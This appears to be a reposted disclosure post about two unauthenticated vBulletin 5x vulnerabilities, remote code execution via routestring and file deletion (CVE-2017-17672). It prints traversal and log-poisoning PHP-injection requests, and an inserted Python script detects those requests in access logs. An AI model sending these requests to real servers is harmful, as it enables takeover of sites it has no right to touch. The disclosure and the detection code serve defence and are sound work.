[PoC] Two critical vulnerabilities exist in vBulletin 5x
Recently, security researchers from SecuriTeam published details of vulnerabilities that affect vBulletin 5x. They tried to contact the vBulletin developers to get the issues fixed but received no answer. This means every website running vBulletin 5x is vulnerable.
vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and the MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including the websites and forums of Fortune 500 and Alexa Top 1M companies. According to the latest W3Techs statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while versions 3 and 5 divide the remaining percentage.
- vBulletin routestring Unauthenticated Remote Code Execution
Proof of Concept
We can check if the server is vulnerable by sending the following GET request:
/index.php?routestring=.\\
If the response is:
The server is vulnerable.
If we want to inject PHP code into a file on the server, we can use access.log, for example:
/?LogINJ_START=<?php phpinfo();?>LogINJ_END
After that we can include access.log with our PHP code:
/index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log
You can read the vulnerability analysis here.
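A detection check for the two requests shown above, as an added example that is not part of the original post: it scans access-log lines in combined format for routestring values containing backslashes or `..`, and for PHP open tags in the request target. The sample log entries are constructed, and the rule that legitimate routestring values are forward-slash paths is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote

# Combined log format: client, identity, user, [time], "request line", status, ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<request>.*?)" \d{3} ')
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (%5C, %255C, ...)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_request(request_line):
    """Return the reasons a logged request line matches the activity described above."""
    reasons = []
    # Drop the method and the trailing protocol; the target itself may contain spaces.
    target = request_line.partition(" ")[2].rsplit(" HTTP/", 1)[0]
    if PHP_TAG_RE.search(fully_unquote(target)):
        reasons.append("php-tag-in-request")  # PHP open tag written into the log
    values = parse_qs(target.partition("?")[2], keep_blank_values=True).get("routestring", [])
    # Assumption: legitimate routes are forward-slash paths with no ".." segments.
    if any("\\" in v or ".." in v for v in map(fully_unquote, values)):
        reasons.append("routestring-traversal")
    return reasons

def scan_access_log(lines):
    """Return (line number, client address, reasons) for each suspicious entry."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = LOG_RE.match(line)
        reasons = classify_request(match.group("request")) if match else []
        if reasons:
            findings.append((number, match.group("ip"), reasons))
    return findings

# Constructed sample entries (documentation address ranges), not taken from a real server.
SAMPLE_LOG = [
    r'198.51.100.7 - - [01/Jan/2018:10:00:00 +0000] "GET /index.php?routestring=forum/general HTTP/1.1" 200 5120',
    r'203.0.113.9 - - [01/Jan/2018:10:00:05 +0000] "GET /index.php?routestring=.\\ HTTP/1.1" 200 312',
    r'203.0.113.9 - - [01/Jan/2018:10:00:09 +0000] "GET /?LogINJ_START=<?php phpinfo();?>LogINJ_END HTTP/1.1" 200 5120',
    r'203.0.113.9 - - [01/Jan/2018:10:00:12 +0000] "GET /index.php?routestring=%5C..%5C..%5Cxampp%5Capache%5Clogs%5Caccess.log HTTP/1.1" 200 90211',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```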
- CVE-2017-17672 vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion
Proof of Concept
By sending the following POST request, an unauthenticated attacker can delete files from the victim's server:
The server will then respond with:
You can read the vulnerability analysis here.